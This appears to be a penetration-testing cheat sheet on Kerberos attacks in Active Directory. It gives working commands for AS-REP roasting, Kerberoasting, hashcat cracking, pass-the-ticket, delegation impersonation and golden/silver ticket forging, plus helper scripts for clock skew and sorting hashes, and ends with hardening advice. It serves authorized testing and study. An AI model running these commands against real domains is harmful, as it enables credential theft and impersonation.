Kerberos
aka krb5
Windows domain auth on 88. The home of AS-REP roasting, Kerberoasting, and ticket attacks (pass-the-ticket, golden/silver tickets) for offline cracking and impersonation.
Ports
| Port | Proto | Notes |
|---|---|---|
| 88 | tcp | Kerberos (presence indicates a DC) |
Fingerprint
- 88 open alongside 389/445 means a Domain Controller
- Realm is the AD DNS domain name in UPPERCASE (dom.local → DOM.LOCAL)
Key files
| Path | Holds | Sensitive |
|---|---|---|
| /etc/krb5.conf | realm and KDC config for Linux tooling | |
| *.ccache / KRB5CCNAME | cached tickets for pass-the-ticket | sensitive |
| *.kirbi | Windows ticket format (convert with ticketConverter) | sensitive |
Exploitation primitives
- AS-REP roast accounts with DONT_REQ_PREAUTH (GetNPUsers.py), crack offline
- Kerberoast service accounts with an SPN (GetUserSPNs.py), crack offline
- Pass-the-ticket with a .ccache; golden ticket (krbtgt hash) and silver ticket (service hash)
Overview
Kerberos on 88 is the domain’s ticketing system. Two offline-crackable roasts need almost no access: AS-REP roasting needs only a list of usernames (no credentials), Kerberoasting needs any valid domain account. Stolen tickets let you reuse an identity, and the right key (krbtgt or a service account) lets you forge one.
Sync your clock first
Kerberos refuses tickets when your clock differs from the DC by more than ~5 minutes (KRB_AP_ERR_SKEW / “Clock skew too great”). Do this before any Kerberos auth.
Set your clock from the DC (disable auto-NTP first so it doesn’t drift back):
sudo timedatectl set-ntp off && sudo ntpdate <DC_IP>
No ntpdate installed? Use rdate:
sudo rdate -n <DC_IP>
Don’t want to touch your system clock? Wrap the tool in faketime instead, using the offset that sudo ntpdate -q <DC_IP> reports:
faketime '+7h' nxc smb <DC_IP> -u user -p pass -k
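The clock-sync procedure above, scripted as an added example (not code from the original page): it parses the offset that ntpdate -q reports, decides whether it exceeds the KDC's default 300 s tolerance, and only then wraps the command in faketime so the system clock is never touched. It assumes ntpdate, sed, awk and faketime are installed; the DC address 10.10.10.10 and the ntpdate output lines at the bottom are constructed samples.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: measure skew against the DC
# with `ntpdate -q` and run a Kerberos tool under faketime with a matching
# offset, so the system clock is never touched. Assumes ntpdate, sed, awk
# and faketime are installed; the ntpdate output at the bottom is constructed.

# Extract the "offset N" field from ntpdate -q output and print it rounded
# to whole seconds (negative when the DC is behind us). Returns 1 when no
# offset line is present, e.g. NTP filtered or the DC unreachable.
skew_seconds() {
    local off
    off=$(printf '%s\n' "$1" |
          sed -n 's/.*offset +\{0,1\}\(-\{0,1\}[0-9][0-9]*\.[0-9][0-9]*\).*/\1/p' |
          head -n 1)
    [ -n "$off" ] || return 1
    awk -v o="$off" 'BEGIN { printf "%d\n", (o < 0 ? o - 0.5 : o + 0.5) }'
}

# Turn a signed second offset into a libfaketime relative offset in whole
# minutes (25199 -> "+420m"). Minute granularity leaves at most 30 s of
# residual skew, far inside the KDC's default 300 s tolerance.
faketime_arg() {
    local secs=$1 abs mins sign='+'
    abs=${secs#-}
    mins=$(( (abs + 30) / 60 ))
    if [ "$secs" -lt 0 ]; then sign='-'; fi
    printf '%s%dm\n' "$sign" "$mins"
}

# True when the skew is beyond what the KDC tolerates by default (300 s).
needs_fix() {
    [ "${1#-}" -gt 300 ]
}

# Run COMMAND... under faketime when the skew against DC requires it;
# otherwise (or if ntpdate is missing / the DC ignores NTP) run it as is.
kerb_run() {
    local dc=$1 out secs
    shift
    if out=$(ntpdate -q "$dc" 2>/dev/null) && secs=$(skew_seconds "$out") \
       && needs_fix "$secs"; then
        echo "[*] DC skew ${secs}s, wrapping in faketime $(faketime_arg "$secs")" >&2
        faketime "$(faketime_arg "$secs")" "$@"
    else
        "$@"
    fi
}

# Constructed sample of `ntpdate -q` output for a DC running 7 h ahead of us...
SAMPLE_AHEAD='server 10.10.10.10, stratum 3, offset 25198.731205, delay 0.02574
13 Mar 12:00:00 ntpdate[4242]: step time server 10.10.10.10 offset 25198.731205 sec'
# ...and for a DC 72 s behind us, which Kerberos still accepts.
SAMPLE_BEHIND='server 10.10.10.10, stratum 3, offset -72.412000, delay 0.02574'

# Dry run on the samples: ./skew.sh demo
# Real use:               kerb_run <DC_IP> nxc smb <DC_IP> -u user -p pass -k
if [ "${1:-}" = demo ]; then
    for s in "$SAMPLE_AHEAD" "$SAMPLE_BEHIND"; do
        secs=$(skew_seconds "$s")
        if needs_fix "$secs"; then
            echo "skew ${secs}s -> faketime $(faketime_arg "$secs")"
        else
            echo "skew ${secs}s -> within tolerance, no faketime needed"
        fi
    done
fi
```

Rounding to minutes rather than passing the raw seconds is deliberate: the residual error is at most 30 s, so the ticket stays well inside the skew window, and the offset string stays readable in process listings when you need to reproduce a run later.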
Roasting
AS-REP roast (accounts without preauth):
impacket-GetNPUsers dom.local/ -usersfile users.txt -no-pass -dc-ip <DC_IP> -format hashcat -outputfile asrep.hash
Crack it (hashcat mode 18200):
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
Kerberoast (SPN accounts):
impacket-GetUserSPNs dom.local/user:pass -dc-ip <DC_IP> -request -outputfile tgs.hash
Crack it (hashcat mode 13100):
hashcat -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt
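Both roasting steps above feed hashcat, and the mode depends on the encryption type in the hash, not just on which tool produced it. As an added example (not code from the original page), this script sorts a mixed output file into one file per hashcat mode, deduplicates each, and prints the matching hashcat command. Modes 18200/13100 are the RC4 (etype 23) ones the page lists; accounts with RC4 disabled come back as etype 17/18 and need the AES modes, and hashcat will not load a file that mixes them. Mode numbers are taken from hashcat's mode list (confirm with hashcat --help on your build); the hash lines at the bottom are constructed samples with dummy hex, not real captures.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: split a mixed file of roast
# hashes (GetNPUsers / GetUserSPNs hashcat format) into one file per hashcat
# mode before cracking. Mode numbers are from hashcat's mode list; the sample
# hashes at the bottom are constructed with dummy hex.

# Print the hashcat mode for one hash line; return 1 if it is not a
# Kerberos roast hash we recognise.
hashcat_mode() {
    case "$1" in
        '$krb5asrep$23$'*) echo 18200 ;;   # AS-REP, RC4-HMAC (etype 23)
        '$krb5asrep$17$'*) echo 32100 ;;   # AS-REP, AES128 (etype 17)
        '$krb5asrep$18$'*) echo 32200 ;;   # AS-REP, AES256 (etype 18)
        '$krb5tgs$23$'*)   echo 13100 ;;   # TGS-REP / Kerberoast, RC4-HMAC
        '$krb5tgs$17$'*)   echo 19600 ;;   # TGS-REP, AES128
        '$krb5tgs$18$'*)   echo 19700 ;;   # TGS-REP, AES256
        *) return 1 ;;
    esac
}

# split_roasts FILE [OUTDIR] [WORDLIST]: write OUTDIR/<mode>.hash files
# (deduplicated), report unrecognised lines on stderr, and print one
# hashcat command per mode on stdout.
split_roasts() {
    local file=$1 outdir=${2:-.} wordlist=${3:-/usr/share/wordlists/rockyou.txt}
    local line mode modes=""
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        if mode=$(hashcat_mode "$line"); then
            case " $modes " in
                *" $mode "*) ;;
                *) modes="$modes $mode"; : > "$outdir/$mode.hash" ;;  # first of this mode: start fresh
            esac
            printf '%s\n' "$line" >> "$outdir/$mode.hash"
        else
            printf 'skipping unrecognised line: %.40s\n' "$line" >&2
        fi
    done < "$file"
    for mode in $modes; do
        # Duplicate lines (the same SPN requested twice) only waste GPU time.
        sort -u -o "$outdir/$mode.hash" "$outdir/$mode.hash"
        printf 'hashcat -m %s %s/%s.hash %s\n' "$mode" "$outdir" "$mode" "$wordlist"
    done
}

# Constructed sample: one AS-REP hash, a duplicated RC4 Kerberoast hash,
# an AES256-only Kerberoast hash, and a stray line. Hex is dummy.
SAMPLE_HASHES='$krb5asrep$23$jdoe@DOM.LOCAL:0a1b2c3d4e5f60718293a4b5c6d7e8f9$00112233445566778899aabbccddeeff
$krb5tgs$23$*svc_sql$DOM.LOCAL$MSSQLSvc/sql01.dom.local:1433*$0a1b2c3d4e5f60718293a4b5c6d7e8f9$00112233445566778899aabbccddeeff
$krb5tgs$23$*svc_sql$DOM.LOCAL$MSSQLSvc/sql01.dom.local:1433*$0a1b2c3d4e5f60718293a4b5c6d7e8f9$00112233445566778899aabbccddeeff
$krb5tgs$18$svc_web$DOM.LOCAL$*HTTP/web01.dom.local*$00112233445566778899aabbccddeeff$0a1b2c3d4e5f60718293a4b5c6d7e8f9
this is not a hash'

# Dry run on the sample: ./split_roasts.sh demo
# Real use: cat asrep.hash tgs.hash > roast.txt && split_roasts roast.txt out/
if [ "${1:-}" = demo ]; then
    tmp=$(mktemp) && printf '%s\n' "$SAMPLE_HASHES" > "$tmp"
    split_roasts "$tmp" "$(mktemp -d)"
    rm -f "$tmp"
fi
```

If a service account only ever shows up as etype 18, that is a hint the account (or the domain) has RC4 disabled; AES256 cracking is roughly an order of magnitude slower per guess, so prioritise wordlists and rules accordingly rather than throwing the full RC4 workflow at it.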
Tickets
Set the ticket cache:
export KRB5CCNAME=ticket.ccache
Use it (target by hostname, not IP, and name the user the ticket was issued to):
impacket-psexec -k -no-pass dom.local/administrator@dc.dom.local
Delegation
Unconstrained: once a privileged user’s TGT lands on the host, export it (sekurlsa::tickets /export in Mimikatz, or watch for new logons with Rubeus monitor).
Constrained (msDS-AllowedToDelegateTo): S4U2self then S4U2proxy to impersonate any user (that is not marked sensitive or in Protected Users) to the allowed SPN:
getST.py -spn cifs/target.dom.local -impersonate administrator -dc-ip <DC_IP> dom.local/svc:pass
Forge tickets once you hold the key: golden with the krbtgt hash, silver with the service account’s hash plus the target SPN (-spn cifs/dc.dom.local). ticketer writes <user>.ccache, which you load with KRB5CCNAME as above:
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <SID> -domain dom.local administrator
Convert tickets between formats
Windows .kirbi (Rubeus/Mimikatz) ↔ Linux .ccache (impacket) — needed to reuse a stolen ticket across platforms:
impacket-ticketConverter ticket.kirbi ticket.ccache
Notes
Always target by hostname, not IP (Kerberos binds tickets to SPNs), and tools usually need the realm in UPPERCASE. If auth still fails after a clock sync, check the realm/KDC in /etc/krb5.conf.
Hardening
Strong service-account passwords (or gMSAs), require preauth on every account, and protect the krbtgt hash (on compromise rotate it twice, waiting at least one replication interval between rotations so existing tickets are actually invalidated).